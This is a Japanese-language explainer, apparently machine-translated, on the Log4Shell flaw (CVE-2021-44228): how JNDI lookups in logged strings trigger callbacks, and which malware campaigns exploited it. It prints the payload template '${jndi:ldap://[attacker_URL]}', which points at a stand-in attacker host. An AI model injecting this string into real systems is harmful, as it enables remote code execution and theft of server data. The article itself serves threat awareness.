Log4Shell Vulnerability

2021年12月10日、Apache Log4jJavaベースのロギングプラットフォームの重大な脆弱性に対するエクスプロイトがリリースされました公に。 CVE-2021-44228またはLog4Shellとして追跡されているこの脆弱性は、Log4j2.0-beta9から2.14.1までのLog4jバージョンに影響を与えます。攻撃者はこのエクスプロイトを利用して、認証されていないリモートアクセスを確立したり、コードを実行したり、マルウェアの脅威を配信したり、情報を収集したりできます。 Log4jはエンタープライズアプリケーションやクラウドサービスで広く使用されているため、この脆弱性には重大なステータスが割り当てられます。

Log4Shellの技術的な詳細

このエクスプロイトは、攻撃者がWebブラウザのユーザーエージェントを変更することから始まります。次に、サイトにアクセスするか、次の形式でWebサイトに存在する特定の文字列を検索します。

$ {jndi：ldap：// [attacker_URL]}

その結果、文字列がWebサーバーのアクセスログに追加されます。次に、攻撃者はLog4jアプリケーションがこれらのログを解析し、追加された文字列に到達するのを待ちます。この場合、バグがトリガーされ、サーバーはJNDI文字列に存在するURLへのコールバックを作成します。そのURLは、Base64でエンコードされたコマンドまたはJavaクラスを処理するために悪用されますその後、侵害されたデバイスでそれらを実行します。

Apacheは、エクスプロイトに対処して修正するために、新しいバージョンLog4j 2.15.0をすぐにリリースしましたが、脆弱なシステムのかなりの量が長期間パッチを適用されないままになる可能性があります。同時に、脅威アクターはLog4Shellのゼロデイ脆弱性にすぐに気づき、悪用するのに適したサーバーのスキャンを開始しました。 infosecコミュニティは、Log4Shellを使用して、さまざまなマルウェアの脅威を提供する多数の攻撃キャンペーンを追跡してきました。

Log4Shellは、暗号マイナー、ボットネット、バックドア、およびデータ収集攻撃で使用されます

Log4Shellを運用に実装した最初の脅威アクターの1つは、 Kinsing暗号マイニングボットネットの背後にいるサイバー犯罪者でした。ハッカーはLog4Shellを使用して、Base64でエンコードされたペイロードを配信し、シェルスクリプトを実行しました。これらのスクリプトの役割は、独自のKinsingマルウェアが実行される前に、標的となるシステムを競合する暗号マイニングの脅威から排除することです。

Netlab 360は、この脆弱性を利用して、侵害されたデバイスにMiraiおよびMuhstikボットネットのバージョンをインストールする脅威アクターを検出しました。これらのマルウェアの脅威は、感染したシステムをIoTデバイスとサーバーのネットワークに追加するように設計されており、攻撃者はDDoS（Distributed Denial-of-Service）攻撃を開始するか、暗号マイナーを展開するように指示できます。その後。

Microsoft Threat Intelligence Centerによると、Log4jエクスプロイトは、CobaltStrikeビーコンをドロップする攻撃キャンペーンの標的にもなりました。 Cobalt Strikeは、企業のセキュリティシステムに対する侵入テストに使用される正規のソフトウェアツールです。ただし、そのバックドア機能により、多数の脅威アクターグループの武器の共通部分になっています。その後、被害者のネットワークへの違法なバックドアアクセスが、ランサムウェア、情報スティーラー、その他のマルウェアの脅威などの次の段階のペイロードを配信するために使用されます。

Log4Shellを悪用して、サーバーデータを含む環境変数を取得できます。このようにして、攻撃者はホストの名前、OS名、OSバージョン番号、Log4jサービスが実行されているユーザー名などにアクセスできます。